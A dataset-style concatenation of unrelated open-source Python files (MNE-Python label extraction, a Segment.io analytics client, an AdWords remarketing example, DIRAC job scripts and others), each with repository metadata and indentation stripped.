for slabel in sub_labels:
if slabel.hemi == 'lh':
this_vertno = np.intersect1d(vertno[0], slabel.vertices)
vertidx = np.searchsorted(vertno[0], this_vertno)
elif slabel.hemi == 'rh':
this_vertno = np.intersect1d(vertno[1], slabel.vertices)
vertidx = nvert[0] + np.searchsorted(vertno[1], this_vertno)
else:
raise ValueError('label %s has invalid hemi' % label.name)
this_vertidx.append(vertidx)
# convert it to an array
this_vertidx = np.concatenate(this_vertidx)
if len(this_vertidx) == 0:
msg = ('source space does not contain any vertices for label %s'
% label.name)
if not allow_empty:
raise ValueError(msg)
else:
logger.warning(msg + '. Assigning all-zero time series to '
'label.')
this_vertidx = None # to later check if label is empty
label_vertidx.append(this_vertidx)
# mode-dependent initalization
if mode == 'mean':
pass # we have this here to catch invalid values for mode
elif mode == 'mean_flip':
# get the sign-flip vector for every label
label_flip = _get_label_flip(labels, label_vertidx, src)
elif mode == 'pca_flip':
# get the sign-flip vector for every label
label_flip = _get_label_flip(labels, label_vertidx, src)
elif mode == 'max':
pass # we calculate the maximum value later
else:
raise ValueError('%s is an invalid mode' % mode)
# loop through source estimates and extract time series
for stc in stcs:
# make sure the stc is compatible with the source space
if len(stc.vertices[0]) != nvert[0] or \
len(stc.vertices[1]) != nvert[1]:
raise ValueError('stc not compatible with source space')
if any(np.any(svn != vn) for svn, vn in zip(stc.vertices, vertno)):
raise ValueError('stc not compatible with source space')
logger.info('Extracting time courses for %d labels (mode: %s)'
% (n_labels, mode))
# do the extraction
label_tc = np.zeros((n_labels, stc.data.shape[1]),
dtype=stc.data.dtype)
if mode == 'mean':
for i, vertidx in enumerate(label_vertidx):
if vertidx is not None:
label_tc[i] = np.mean(stc.data[vertidx, :], axis=0)
elif mode == 'mean_flip':
for i, (vertidx, flip) in enumerate(zip(label_vertidx,
label_flip)):
if vertidx is not None:
label_tc[i] = np.mean(flip * stc.data[vertidx, :], axis=0)
elif mode == 'pca_flip':
for i, (vertidx, flip) in enumerate(zip(label_vertidx,
label_flip)):
if vertidx is not None:
U, s, V = linalg.svd(stc.data[vertidx, :],
full_matrices=False)
# determine sign-flip
sign = np.sign(np.dot(U[:, 0], flip))
# use average power in label for scaling
scale = linalg.norm(s) / np.sqrt(len(vertidx))
label_tc[i] = sign * scale * V[0]
elif mode == 'max':
for i, vertidx in enumerate(label_vertidx):
if vertidx is not None:
label_tc[i] = np.max(np.abs(stc.data[vertidx, :]), axis=0)
else:
raise ValueError('%s is an invalid mode' % mode)
# this is a generator!
yield label_tc
@verbose
def extract_label_time_course(stcs, labels, src, mode='mean_flip',
allow_empty=False, return_generator=False,
verbose=None):
"""Extract label time course for lists of labels and source estimates
This function will extract one time course for each label and source
estimate. The way the time courses are extracted depends on the mode
parameter.
Valid values for mode are:
- 'mean': Average within each label.
- 'mean_flip': Average within each label with sign flip depending
on source orientation.
- 'pca_flip': Apply an SVD to the time courses within each label
and use the scaled and sign-flipped first right-singular vector
as the label time course. The scaling is performed such that the
power of the label time course is the same as the average
per-vertex time course power within the label. The sign of the
resulting time course is adjusted by multiplying it with
"sign(dot(u, flip))" where u is the first left-singular vector,
and flip is a sing-flip vector based on the vertex normals. This
procedure assures that the phase does not randomly change by 180
degrees from one stc to the next.
- 'max': Max value within each label.
Parameters
----------
stcs : SourceEstimate | list (or generator) of SourceEstimate
The source estimates from which to extract the time course.
labels : Label | list of Label
The labels for which to extract the time course.
src : list
Source spaces for left and right hemisphere.
mode : str
Extraction mode, see explanation above.
allow_empty : bool
Instead of emitting an error, return all-zero time courses for labels
that do not have any vertices in the source estimate.
return_generator : bool
If True, a generator instead of a list is returned.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
label_tc : array | list (or generator) of array, shape=(len(labels), n_times)
Extracted time course for each label and source estimate.
""" # noqa
# convert inputs to lists
if isinstance(stcs, SourceEstimate):
stcs = [stcs]
return_several = False
return_generator = False
else:
return_several = True
if not isinstance(labels, list):
labels = [labels]
label_tc = _gen_extract_label_time_course(stcs, labels, src, mode=mode,
allow_empty=allow_empty)
if not return_generator:
# do the extraction and return a list
label_tc = list(label_tc)
if not return_several:
# input was a single SoureEstimate, return single array
label_tc = label_tc[0]
return label_tc
|
cmoutard/mne-python
|
mne/source_estimate.py
|
Python
|
bsd-3-clause
| 110,449
|
[
"Mayavi"
] |
894e552b3beb825012e4c9c0c576ede0eb5af23156c1292ea6e2323fe5a166cd
|
# from distutils.core import setup
from setuptools import setup
import os
setup(
name="bigsi",
version="0.3.8",
packages=[
"bigsi",
"bigsi.bloom",
"bigsi.cmds",
"bigsi.utils",
"bigsi.graph",
"bigsi.storage",
"bigsi.matrix",
"bigsi.scoring",
"bigsi.tests",
],
keywords="DBG coloured de bruijn graphs sequence search signture files signature index bitsliced",
license="MIT",
url="http://github.com/phelimb/bigsi",
description="BItsliced Genomic Signature Index - Efficient indexing and search in very large collections of WGS data",
author="Phelim Bradley",
author_email="wave@phel.im",
install_requires=[
"cython",
"hug",
"numpy",
"mmh3",
"bitarray",
"redis",
"biopython",
"pyyaml",
"humanfriendly",
],
entry_points={"console_scripts": ["bigsi = bigsi.__main__:main"]},
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
"Development Status :: 3 - Alpha",
# Pick your license as you wish (should match "license" above)
"License :: OSI Approved :: MIT License",
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
],
)
|
Phelimb/cbg
|
setup.py
|
Python
|
mit
| 1,737
|
[
"Biopython"
] |
d759e88608f723e636a0b6ebbbd53be5cc1b1c00cd5965c5615fc5db04f060fd
|
import collections
from datetime import datetime, timedelta
import json
import logging
import numbers
import threading
from dateutil.tz import tzutc
import requests
from stats import Statistics
from errors import ApiError
from utils import guess_timezone, DatetimeSerializer
import options
logging_enabled = True
logger = logging.getLogger('analytics')
def log(level, *args, **kwargs):
if logging_enabled:
method = getattr(logger, level)
method(*args, **kwargs)
def package_exception(client, data, e):
log('warn', 'Segment.io request error', exc_info=True)
client._on_failed_flush(data, e)
def package_response(client, data, response):
# TODO: reduce the complexity (mccabe)
if response.status_code == 200:
client._on_successful_flush(data, response)
elif response.status_code == 400:
content = response.text
try:
body = json.loads(content)
code = 'bad_request'
message = 'Bad request'
if 'error' in body:
error = body.error
if 'code' in error:
code = error['code']
if 'message' in error:
message = error['message']
client._on_failed_flush(data, ApiError(code, message))
except Exception:
client._on_failed_flush(data, ApiError('Bad Request', content))
else:
client._on_failed_flush(data,
ApiError(response.status_code, response.text))
def request(client, url, data):
log('debug', 'Sending request to Segment.io ...')
try:
response = requests.post(url,
data=json.dumps(data, cls=DatetimeSerializer),
headers={'content-type': 'application/json'},
timeout=client.timeout)
log('debug', 'Finished Segment.io request.')
package_response(client, data, response)
return response.status_code == 200
except requests.ConnectionError as e:
package_exception(client, data, e)
except requests.Timeout as e:
package_exception(client, data, e)
return False
class FlushThread(threading.Thread):
def __init__(self, client):
threading.Thread.__init__(self)
self.client = client
def run(self):
log('debug', 'Flushing thread running ...')
self.client._sync_flush()
log('debug', 'Flushing thread done.')
class Client(object):
"""The Client class is a batching asynchronous python wrapper over the
Segment.io API.
"""
def __init__(self, secret=None, log_level=logging.INFO, log=True,
flush_at=20, flush_after=timedelta(0, 10),
async=True, max_queue_size=10000, stats=Statistics(),
timeout=10, send=True):
"""Create a new instance of a analytics-python Client
:param str secret: The Segment.io API secret
:param logging.LOG_LEVEL log_level: The logging log level for the
client talks to. Use log_level=logging.DEBUG to troubleshoot
: param bool log: False to turn off logging completely, True by default
: param int flush_at: Specicies after how many messages the client will
flush to the server. Use flush_at=1 to disable batching
: param datetime.timedelta flush_after: Specifies after how much time
of no flushing that the server will flush. Used in conjunction with
the flush_at size policy
: param bool async: True to have the client flush to the server on
another thread, therefore not blocking code (this is the default).
False to enable blocking and making the request on the calling thread.
: param float timeout: Number of seconds before timing out request to
Segment.io
: param bool send: True to send requests, False to not send. False to
turn analytics off (for testing).
"""
self.secret = secret
self.queue = collections.deque()
self.last_flushed = None
if not log:
# TODO: logging_enabled is assigned, but not used
logging_enabled = False
# effectively disables the logger
logger.setLevel(logging.CRITICAL)
else:
logger.setLevel(log_level)
self.async = async
self.max_queue_size = max_queue_size
self.max_flush_size = 50
self.flush_at = flush_at
self.flush_after = flush_after
self.timeout = timeout
self.stats = stats
self.flush_lock = threading.Lock()
self.flushing_thread = None
self.send = send
self.success_callbacks = []
self.failure_callbacks = []
def set_log_level(self, level):
"""Sets the log level for analytics-python
:param logging.LOG_LEVEL level: The level at which analytics-python log
should talk at
"""
logger.setLevel(level)
def _check_for_secret(self):
if not self.secret:
raise Exception('Please set analytics.secret before calling ' +
'identify or track.')
def _coerce_unicode(self, cmplx):
return unicode(cmplx)
def _clean_list(self, l):
return [self._clean(item) for item in l]
def _clean_dict(self, d):
data = {}
for k, v in d.iteritems():
try:
data[k] = self._clean(v)
except TypeError:
log('warn', 'Dictionary values must be serializeable to ' +
'JSON "%s" value %s of type %s is unsupported.'
% (k, v, type(v)))
return data
def _clean(self, item):
if isinstance(item, (str, unicode, int, long, float, bool,
numbers.Number, datetime)):
return item
elif isinstance(item, (set, list, tuple)):
return self._clean_list(item)
elif isinstance(item, dict):
return self._clean_dict(item)
else:
return self._coerce_unicode(item)
def on_success(self, callback):
"""
Assign a callback to fire after a successful flush
:param func callback: A callback that will be fired on a flush success
"""
self.success_callbacks.append(callback)
def on_failure(self, callback):
"""
Assign a callback to fire after a failed flush
:param func callback: A callback that will be fired on a failed flush
"""
self.failure_callbacks.append(callback)
def identify(self, user_id=None, traits={}, context={}, timestamp=None):
"""Identifying a user ties all of their actions to an id, and
associates user traits to that id.
:param str user_id: the user's id after they are logged in. It's the
same id as which you would recognize a signed-in user in your system.
: param dict traits: a dictionary with keys like subscriptionPlan or
age. You only need to record a trait once, no need to send it again.
Accepted value types are string, boolean, ints,, longs, and
datetime.datetime.
: param dict context: An optional dictionary with additional
information thats related to the visit. Examples are userAgent, and IP
address of the visitor.
: param datetime.datetime timestamp: If this event happened in the
past, the timestamp can be used to designate when the identification
happened. Careful with this one, if it just happened, leave it None.
If you do choose to provide a timestamp, make sure it has a timezone.
"""
self._check_for_secret()
if not user_id:
raise Exception('Must supply a user_id.')
if traits is not None and not isinstance(traits, dict):
raise Exception('Traits must be a dictionary.')
if context is not None and not isinstance(context, dict):
raise Exception('Context must be a dictionary.')
if timestamp is None:
timestamp = datetime.utcnow().replace(tzinfo=tzutc())
elif not isinstance(timestamp, datetime):
raise Exception('Timestamp must be a datetime object.')
else:
timestamp = guess_timezone(timestamp)
cleaned_traits = self._clean(traits)
action = {'userId': user_id,
'traits': cleaned_traits,
'context': context,
'timestamp': timestamp.isoformat(),
'action': 'identify'}
context['library'] = 'analytics-python'
if self._enqueue(action):
self.stats.identifies += 1
def track(self, user_id=None, event=None, properties={}, context={},
timestamp=None):
"""Whenever a user triggers an event, you'll want to track it.
:param str user_id: the user's id after they are logged in. It's the
same id as which you would recognize a signed-in user in your system.
:param str event: The event name you are tracking. It is recommended
that it is in human readable form. For example, "Bought T-Shirt"
or "Started an exercise"
:param dict properties: A dictionary with items that describe the
event in more detail. This argument is optional, but highly recommended
- you'll find these properties extremely useful later. Accepted value
types are string, boolean, ints, doubles, longs, and datetime.datetime.
:param dict context: An optional dictionary with additional information
thats related to the visit. Examples are userAgent, and IP address
of the visitor.
:param datetime.datetime timestamp: If this event happened in the past,
the timestamp can be used to designate when the identification
happened. Careful with this one, if it just happened, leave it None.
If you do choose to provide a timestamp, make sure it has a timezone.
"""
self._check_for_secret()
if not user_id:
raise Exception('Must supply a user_id.')
if not event:
raise Exception('Event is a required argument as a non-empty ' +
'string.')
if properties is not None and not isinstance(properties, dict):
raise Exception('Context must be a dictionary.')
if context is not None and not isinstance(context, dict):
raise Exception('Context must be a dictionary.')
if timestamp is None:
timestamp = datetime.utcnow().replace(tzinfo=tzutc())
elif not isinstance(timestamp, datetime):
raise Exception('Timestamp must be a datetime.datetime object.')
else:
timestamp = guess_timezone(timestamp)
cleaned_properties = self._clean(properties)
action = {'userId': user_id,
'event': event,
'context': context,
'properties': cleaned_properties,
'timestamp': timestamp.isoformat(),
'action': 'track'}
context['library'] = 'analytics-python'
if self._enqueue(action):
self.stats.tracks += 1
def alias(self, from_id, to_id, context={}, timestamp=None):
"""Aliases an anonymous user into an identified user
:param str from_id: the anonymous user's id before they are logged in
:param str to_id: the identified user's id after they're logged in
:param dict context: An optional dictionary with additional information
thats related to the visit. Examples are userAgent, and IP address
of the visitor.
:param datetime.datetime timestamp: If this event happened in the past,
the timestamp can be used to designate when the identification
happened. Careful with this one, if it just happened, leave it None.
If you do choose to provide a timestamp, make sure it has a timezone.
"""
self._check_for_secret()
if not from_id:
raise Exception('Must supply a from_id.')
if not to_id:
raise Exception('Must supply a to_id.')
if context is not None and not isinstance(context, dict):
raise Exception('Context must be a dictionary.')
if timestamp is None:
timestamp = datetime.utcnow().replace(tzinfo=tzutc())
elif not isinstance(timestamp, datetime):
raise Exception('Timestamp must be a datetime.datetime object.')
else:
timestamp = guess_timezone(timestamp)
action = {'from': from_id,
'to': to_id,
'context': context,
'timestamp': timestamp.isoformat(),
'action': 'alias'}
context['library'] = 'analytics-python'
if self._enqueue(action):
self.stats.aliases += 1
def _should_flush(self):
""" Determine whether we should sync """
full = len(self.queue) >= self.flush_at
stale = self.last_flushed is None
if not stale:
stale = datetime.now() - self.last_flushed > self.flush_after
return full or stale
def _enqueue(self, action):
# if we've disabled sending, just return False
if not self.send:
return False
submitted = False
if len(self.queue) < self.max_queue_size:
self.queue.append(action)
self.stats.submitted += 1
submitted = True
log('debug', 'Enqueued ' + action['action'] + '.')
else:
log('warn', 'analytics-python queue is full')
if self._should_flush():
self.flush()
return submitted
def _on_successful_flush(self, data, response):
if 'batch' in data:
for item in data['batch']:
self.stats.successful += 1
for callback in self.success_callbacks:
callback(data, response)
def _on_failed_flush(self, data, error):
if 'batch' in data:
for item in data['batch']:
self.stats.failed += 1
for callback in self.failure_callbacks:
callback(data, error)
def _flush_thread_is_free(self):
return self.flushing_thread is None \
or not self.flushing_thread.is_alive()
def flush(self, async=None):
""" Forces a flush from the internal queue to the server
:param bool async: True to block until all messages have been flushed
"""
flushing = False
# if the async arg is provided, it overrides the client's settings
if async is None:
async = self.async
if async:
# We should asynchronously flush on another thread
with self.flush_lock:
if self._flush_thread_is_free():
log('debug', 'Initiating asynchronous flush ..')
self.flushing_thread = FlushThread(self)
self.flushing_thread.start()
flushing = True
else:
log('debug', 'The flushing thread is still active.')
else:
# Flushes on this thread
log('debug', 'Initiating synchronous flush ..')
self._sync_flush()
flushing = True
if flushing:
self.last_flushed = datetime.now()
self.stats.flushes += 1
return flushing
def _sync_flush(self):
log('debug', 'Starting flush ..')
successful = 0
failed = 0
url = options.host + options.endpoints['batch']
while len(self.queue) > 0:
batch = []
for i in range(self.max_flush_size):
if len(self.queue) == 0:
break
batch.append(self.queue.pop())
payload = {'batch': batch, 'secret': self.secret}
if request(self, url, payload):
successful += len(batch)
else:
failed += len(batch)
log('debug', 'Successfully flushed {0} items [{1} failed].'.
format(str(successful), str(failed)))
|
GbalsaC/bitnamiP
|
venv/lib/python2.7/site-packages/analytics/client.py
|
Python
|
agpl-3.0
| 16,485
|
[
"VisIt"
] |
1205d76532adfab8cca8feb74803b575c5e98edc228e33f85d12080274550152
|
from module_base import ModuleBase
from module_mixins import ScriptedConfigModuleMixin
from wxPython import wx
class VTKtoPRTools(ScriptedConfigModuleMixin, ModuleBase):
"""Module to convert multi-component VTK image data to PRTools-compatible
dataset.
$Revision: 1.1 $
"""
def __init__(self, module_manager):
ModuleBase.__init__(self, module_manager)
self._config.filename = ''
configList = [
('Output filename:', 'filename', 'base:str', 'filebrowser',
'Type filename or click "browse" button to choose.',
{'fileMode' : wx.wxSAVE,
'fileMask' :
'Matlab text file (*.txt)|*.txt|All files (*.*)|*.*'})
]
ScriptedConfigModuleMixin.__init__(self, configList)
self._createViewFrame(
{'Module (self)' : self})
self._inputData = None
def close(self):
# we play it safe... (the graph_editor/module_manager should have
# disconnected us by now)
for input_idx in range(len(self.get_input_descriptions())):
self.set_input(input_idx, None)
# this will take care of all display thingies
ScriptedConfigModuleMixin.close(self)
# and the baseclass close
ModuleBase.close(self)
del self._inputData
def execute_module(self):
# this is where the good stuff happens...
if len(self._config.filename) == 0:
raise RuntimeError, 'No filename has been set.'
if self._inputData == None:
raise RuntimeError, 'No input data to convert.'
# now let's start going through the data
outfile = file(self._config.filename, 'w')
self._inputData.Update()
nop = self._inputData.GetNumberOfPoints()
noc = self._inputData.GetNumberOfScalarComponents()
pd = self._inputData.GetPointData()
curList = [''] * noc
for i in xrange(nop):
for j in range(noc):
curList[j] = str(pd.GetComponent(i, j))
outfile.write('%s\n' % (' '.join(curList),))
self._module_manager.setProgress((float(i) / (nop - 1)) * 100.0,
'Exporting PRTools data.')
self._module_manager.setProgress(100.0,
'Exporting PRTools data [DONE].')
def get_input_descriptions(self):
return ('VTK Image Data (multiple components)',)
def set_input(self, idx, inputStream):
try:
if inputStream == None or inputStream.IsA('vtkImageData'):
self._inputData = inputStream
else:
raise AttributeError
except AttributeError:
raise TypeError, 'This module requires a vtkImageData as input.'
def get_output_descriptions(self):
return ()
def get_output(self, idx):
raise Exception
def config_to_logic(self):
pass
def logic_to_config(self):
pass
|
nagyistoce/devide
|
modules/user/VTKtoPRTools.py
|
Python
|
bsd-3-clause
| 3,048
|
[
"VTK"
] |
eb3d19422d765f750a6effe226816f734b80445a11afbe8c3e6309038410e567
|
"""
tracker / OffsetTracker is a class which keeps track of which of the slots
defined in a template have already been seen and uses this information to
answer questions about offsets for advanced x expressions.
"""
import copy
import logging
class OffsetTracker(object):
def __init__(self,reduction,term):
# iterate through slots
self._all = {}
blasted = []
for v in reduction.blast():
if term is not None and v.firstTermWeek()[0] != term:
continue
blasted.append(v)
for (i,v) in enumerate(blasted):
self._all[i] = v
self._unused = set(range(0,len(self._all.keys())))
self._last = None
self.reduction = reduction
def addPattern(self,p):
for pp in p.blast():
for (idx,member) in self._all.iteritems():
if pp == member:
if idx in self._unused:
self._unused.remove(idx)
if self._last is None or self._last.key() < pp.key():
self._last = pp
def _calc_init_offset(self,ordered,starting):
offset = -1
if starting is not None:
for i in range(0,len(ordered)):
if i in self._unused and str(starting) == str(self._all[ordered[i]]): # XXX should be able to compare directly
offset = i
break
if offset == -1:
for i in range(0,len(ordered)):
if int(starting.key()) <= int(self._all[ordered[i]].key()):
offset = i
break
if offset == -1:
offset = 0
return offset
def addNextN(self,n,trial = False,starting = None):
# XXX add in out-of-range dates
ordered = sorted(self._unused)
offset = self._calc_init_offset(ordered,starting)
out = set()
for i in range(offset,min(offset+n,len(ordered))):
out.add(ordered[i])
if not trial:
self._unused.remove(ordered[i])
return [self._all[i] for i in out]
def last(self):
return self._last
def first_unused(self):
unused = []
for i in self._unused:
unused.append(self._all[i])
if not len(unused):
return None
return min(unused,key = lambda x : x.key())
|
ieb/timetables
|
python/lib/tracker.py
|
Python
|
agpl-3.0
| 2,399
|
[
"BLAST"
] |
ec1c040832dffbe705834bc9cb1340bdf6b1794add2babc887e725f628e4196f
|
#!/usr/bin/python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example adds two rule-based remarketing user lists.
Adds two rule-based remarketing user lists; one with no site visit date
restrictions and another that will only include users who visit your site in
the next six months.
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory. For more information, see the "Caching authentication information"
section of our README.
"""
import calendar
from datetime import date
from datetime import datetime
from datetime import timedelta
from googleads import adwords
def main(client):
# Initialize appropriate service.
adwords_user_list_service = client.GetService(
'AdwordsUserListService', version='v201502')
# First rule item group - users who visited the checkout page and had more
# than one item in their shopping cart.
checkout_rule_item = {
'StringRuleItem': {
'key': {
'name': 'ecomm_pagetype'
},
'op': 'EQUALS',
'value': 'checkout'
}
}
cart_size_rule_item = {
'NumberRuleItem': {
'key': {
'name': 'cartsize'
},
'op': 'GREATER_THAN',
'value': '1.0'
}
}
# Combine the two rule items into a RuleItemGroup so AdWords will logically
# AND the rules together.
checkout_multiple_item_group = {
'items': [checkout_rule_item, cart_size_rule_item]
}
# Second rule item group - users who checked out within the next 3 months.
today = date.today()
start_date_rule_item = {
'DateRuleItem': {
'key': {
'name': 'checkoutdate'
},
'op': 'AFTER',
'value': today.strftime('%Y%m%d')
}
}
three_months_later = AddMonths(today, 3)
three_months_later_rule_item = {
'DateRuleItem': {
'key': {
'name': 'checkoutdate'
},
'op': 'BEFORE',
'value': three_months_later.strftime('%Y%m%d')
}
}
# Combine the date rule items into a RuleItemGroup
checked_out_date_range_item_group = {
'items': [start_date_rule_item, three_months_later_rule_item]
}
# Combine the rule item groups into a Rule so AdWords will logically OR the
# groups together.
rule = {
'groups': [
checkout_multiple_item_group,
checked_out_date_range_item_group
]
}
# Create the user list with no restrictions on site visit date.
expression_user_list = {
'xsi_type': 'ExpressionRuleUserList',
'name': 'Expression-based user list created at %s'
% datetime.today().strftime('%Y%m%d %H:%M:%S'),
'description': 'Users who checked out in three month window OR visited'
' the checkout page with more than one item in their'
' cart.',
'rule': rule
}
# Create the user list restricted to users who visit your site within the next
# six months.
end_date = AddMonths(today, 6)
date_user_list = {
'xsi_type': 'DateSpecificRuleUserList',
'name': 'Date rule user list created at %s'
% datetime.today().strftime('%Y%m%d %H:%M:%S'),
'description': 'Users who visited the site between %s and %s and checked'
' out in three month window OR visited the checkout page'
' with more than one item in their cart.'
% (today.strftime('%Y%m%d'), end_date.strftime('%Y%m%d')),
'rule': rule,
'startDate': today.strftime('%Y%m%d'),
'endDate': end_date.strftime('%Y%m%d')
}
# Create operations to add the user lists.
operations = [
{
'operand': user_list,
'operator': 'ADD',
} for user_list in [expression_user_list, date_user_list]
]
# Submit the operations.
user_lists = adwords_user_list_service.mutate(operations)
# Display results.
for user_list in user_lists['value']:
print (('User list added with ID %d, name "%s", status "%s", list type'
' "%s", accountUserListStatus "%s", description "%s".') %
(user_list['id'], user_list['name'],
user_list['status'], user_list['listType'],
user_list['accountUserListStatus'], user_list['description']))
def AddMonths(start_date, months):
"""A simple convenience utility for adding months to a given start date.
This increments the months by adding the number of days in the current month
to the current month, for each month.
Args:
start_date: date The date months are being added to.
months: int The number of months to add.
Returns:
A date equal to the start date incremented by the given number of months.
"""
current_date = start_date
i = 0
while i < months:
month_days = calendar.monthrange(current_date.year, current_date.month)[1]
current_date += timedelta(days=month_days)
i += 1
return current_date
if __name__ == '__main__':
# Initialize client object.
adwords_client = adwords.AdWordsClient.LoadFromStorage()
main(adwords_client)
|
richardfergie/googleads-python-lib
|
examples/adwords/v201502/remarketing/add_rule_based_user_lists.py
|
Python
|
apache-2.0
| 5,714
|
[
"VisIt"
] |
a9114332a529cd9e9b9de78acfd658a6f429468b00f23335b08d8c0270165eb8
|
"""
@author: JD Chodera
@author: JH Prinz
"""
from openpathsampling.engines import BaseSnapshot, SnapshotFactory
from . import features
@features.base.attach_features([
features.velocities,
features.coordinates,
features.box_vectors,
features.engine
])
class MDSnapshot(BaseSnapshot):
"""
A fast MD snapshot, which does not proxy the coordinates/velocities.
"""
# The following code does the same as above
#
# MDSnapshot = SnapshotFactory(
# name='MDSnapshot',
# features=[
# features.velocities,
# features.coordinates,
# features.box_vectors,
# features.engine
# ],
# description="A fast MDSnapshot",
# base_class=BaseSnapshot
# )
@features.base.attach_features([
features.statics,
features.kinetics,
features.masses,
features.instantaneous_temperature,
features.engine,
features.traj_quantities,
])
class Snapshot(BaseSnapshot):
"""
The standard snapshot for MD, based on statics and kinetics proxies.
"""
StaticContainer = features.StaticContainer
KineticContainer = features.KineticContainer
@staticmethod
def construct(
coordinates=None,
box_vectors=None,
velocities=None,
statics=None,
kinetics=None,
engine=None):
"""
Construct a new snapshot from numpy arrays
This will create the container objects and return a Snapshot object.
Mostly a helper to allow for easier creation.
You can either use coordinates and velocities and/or statics and
kinetics objects. If both are present the more complex (statics
and kinetics) will be used
Parameters
----------
coordinates : numpy.array, shape ``(n_atoms, n_spatial)``
the atomic coordinates
box_vectors : numpy.array, shape ``(n_spatial, n_spatial)``
the box vectors
velocities : numpy.array, shape ``(n_atoms, n_spatial)``
the atomic velocities
statics : `openpathsampling.engines.openmm.StaticContainer`
the statics container if it already exists
kinetics : `openpathsampling.engines.openmm.KineticContainer`
the kinetics container if it already exists
engine : :obj:`openpathsampling.engines.DynamicsEngine`
the engine that should be referenced as the one used to
generate the object
Returns
-------
:obj:`Snapshot`
the created `Snapshot` object
"""
if statics is None:
statics = Snapshot.StaticContainer(
coordinates=coordinates,
box_vectors=box_vectors,
engine=engine
)
if kinetics is None:
kinetics = Snapshot.KineticContainer(
velocities=velocities,
engine=engine
)
return Snapshot(
engine=engine,
statics=statics,
kinetics=kinetics
)
@property
def topology(self):
return self.engine.topology
|
choderalab/openpathsampling
|
openpathsampling/engines/openmm/snapshot.py
|
Python
|
lgpl-2.1
| 3,134
|
[
"OpenMM"
] |
bcab9ef1da7e0557532ba1f1fea8f829c8159f9016abd520573177bb41f1b3d7
|
#!/usr/bin/env python3
#* This file is part of the MOOSE framework
#* https://www.mooseframework.org
#*
#* All rights reserved, see COPYRIGHT for full restrictions
#* https://github.com/idaholab/moose/blob/master/COPYRIGHT
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html
import os
import sys
import numpy as np
import matplotlib.pyplot as plt
def expected():
ini = 1.0
res = 0.5
lim = 1E-5
lo2 = 0.5 * lim
alpha = (ini - res) / 4.0 / lo2**3
beta = -3.0 * alpha * lo2**2
data = [i*1E-5/100 for i in range(100)]
data = [(x, alpha * (x - lo2)**3 + beta * (x - lo2) + (ini + res) / 2.0) for x in data]
return zip(*data)
def moose():
f = open("gold/small_deform_hard3_update_version.csv")
data = [line.strip().split(",") for line in f.readlines()[2:-1]]
data = [(d[2], d[4]) for d in data]
f.close()
return zip(*data)
plt.figure()
expect = expected()
m = moose()
plt.plot(expect[0], expect[1], 'k-', linewidth = 3.0, label = 'expected')
plt.plot(m[0], m[1], 'k^', label = 'MOOSE')
plt.legend(loc = 'upper right')
plt.xlabel("internal parameter")
plt.ylabel("Tensile strength")
plt.title("Tensile yield with softening")
plt.savefig("small_deform_hard3.pdf")
sys.exit(0)
|
nuclear-wizard/moose
|
modules/tensor_mechanics/test/tests/tensile/small_deform_hard3.py
|
Python
|
lgpl-2.1
| 1,286
|
[
"MOOSE"
] |
2d55797f0a376641c6e96a9ad951fd9901069f769f1fae63f168ce2fc42be020
|
from pycp2k.inputsection import InputSection
class _gaussian1(InputSection):
def __init__(self):
InputSection.__init__(self)
self.Ww = None
self.Sigma = None
self._name = "GAUSSIAN"
self._keywords = {'Sigma': 'SIGMA', 'Ww': 'WW'}
|
SINGROUP/pycp2k
|
pycp2k/classes/_gaussian1.py
|
Python
|
lgpl-3.0
| 277
|
[
"Gaussian"
] |
125c4ec4722ae844ff6ab41c3d200289cd000904789ba2ae061efba7f20e1c93
|
#!/usr/bin/env python
########################################################################
# File : dirac-wms-job-reschedule
# Author : Stuart Paterson
########################################################################
"""
Reschedule the given DIRAC job
Example:
$ dirac-wms-job-reschedule 1
Rescheduled job 1
"""
import DIRAC
from DIRAC.Core.Base.Script import Script
@Script()
def main():
# Registering arguments will automatically add their description to the help menu
Script.registerArgument(["JobID: DIRAC Job ID"])
_, args = Script.parseCommandLine(ignoreErrors=True)
from DIRAC.Interfaces.API.Dirac import Dirac, parseArguments
dirac = Dirac()
exitCode = 0
errorList = []
result = dirac.rescheduleJob(parseArguments(args))
if result["OK"]:
print("Rescheduled job %s" % ",".join([str(j) for j in result["Value"]]))
else:
errorList.append((result["Value"][-1], result["Message"]))
print(result["Message"])
exitCode = 2
for error in errorList:
print("ERROR %s: %s" % error)
DIRAC.exit(exitCode)
if __name__ == "__main__":
main()
|
DIRACGrid/DIRAC
|
src/DIRAC/Interfaces/scripts/dirac_wms_job_reschedule.py
|
Python
|
gpl-3.0
| 1,157
|
[
"DIRAC"
] |
0db1a5a5717cb327a951b59b77de05744d03d7637b31f1fd22270926ef8807b9
|
""" SandboxHandler is the implementation of the Sandbox service
in the DISET framework
"""
__RCSID__ = "$Id$"
import os
import time
import threading
import tempfile
from DIRAC import gLogger, S_OK, S_ERROR
from DIRAC.Core.Utilities.File import mkDir
from DIRAC.Core.DISET.RequestHandler import RequestHandler
from DIRAC.Core.Security import Locations, Properties, X509Certificate
from DIRAC.WorkloadManagementSystem.DB.SandboxMetadataDB import SandboxMetadataDB
from DIRAC.DataManagementSystem.Client.DataManager import DataManager
from DIRAC.DataManagementSystem.Service.StorageElementHandler import getDiskSpace
from DIRAC.RequestManagementSystem.Client.ReqClient import ReqClient
from DIRAC.RequestManagementSystem.Client.Request import Request
from DIRAC.RequestManagementSystem.Client.Operation import Operation
from DIRAC.RequestManagementSystem.Client.File import File
from DIRAC.Resources.Storage.StorageElement import StorageElement
sandboxDB = False
def initializeSandboxStoreHandler(serviceInfo):
global sandboxDB
